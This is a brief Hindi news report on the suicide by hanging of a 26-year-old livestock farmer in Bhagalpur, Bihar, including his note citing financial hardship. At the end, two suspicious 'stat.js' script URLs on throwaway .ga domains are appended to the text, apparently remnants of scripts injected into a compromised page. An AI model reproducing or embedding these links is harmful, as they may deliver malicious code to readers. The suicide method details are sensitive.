बिहार राज्य के भागलपुर जिले में एक युवक ने परिवार की आर्थिक तंगी से परेशान होकर अपनी जान दे दी। पुलिस को मिली जानकारी के अनुसार, फांसी लगाने वाले युवक का नाम राहुल कुमार (26 वर्ष) है जोकि भागलपुर जिले के नवगछिया इलाके के भवानीपुर गांव में अपने परिवार के साथ रहता था। साथ ही पुलिस को युवक की लाश के पास से एक सुसाइड नोट बरामद हुआ है।

काफी देर तक अपने कमरे से बाहर नहीं निकला तो घरवालों को कुछ शक हुआ। जिस पर उन्होंने उसके कमरे का दरवाजा खटखटाया। लेकिन अंदर से कोई आवाज ना आने पर उन लोगों ने दरवाजा तोड़ दिया। और कमरे में राहुल को पंखे पर लटका पाया। जिसे देखकर परिवार वालों के होश उड़ गए। घटना के बाद परिवारवालों ने इसकी सूचना पुलिस को दी। पुलिस ने घटनास्थल से लाश समेत एक सुसाइड नोट बरामद किया है, जिसमें राहुल ने अपनी आर्थिक तंगी का जिक्र किया है।
उसने लिखा है कि मैं आर्थिक तंगी की वजह से आत्महत्या कर रहा हूं। इसमें मेरे माता पिता औऱ घरवालों का कोई दोष नहीं है। परिवार वालों से पूछताछ के दौरान मालूम चला कि युवक पशुपालक था और आर्थिक कारणों के कारण दुखी रहता था। ऐसे में पुलिस का कहना है कि उसने आर्थिक कारणों से तंग आकर खुदकुशी कर ली।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms